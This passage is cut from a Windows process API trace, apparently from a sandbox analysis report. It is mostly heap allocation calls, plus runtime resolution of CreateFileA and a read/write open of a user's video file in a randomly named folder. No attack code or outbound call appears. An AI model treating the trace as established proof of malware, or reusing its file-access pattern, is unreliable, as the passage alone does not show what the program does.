hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0199.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.565] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.568] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0199.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd528 [0199.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd528, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0199.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.569] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0199.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.569] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0199.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8db138 [0199.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", cchWideChar=60, lpMultiByteStr=0x8db138, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpUsedDefaultChar=0x0) returned 60 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.570] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\j9c7.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x78) returned 0x8afee8 [0199.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=60, lpWideCharStr=0x8afee8, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi") returned 60 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afee8 | out: hHeap=0x8a0000) returned 1 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0199.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.573] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 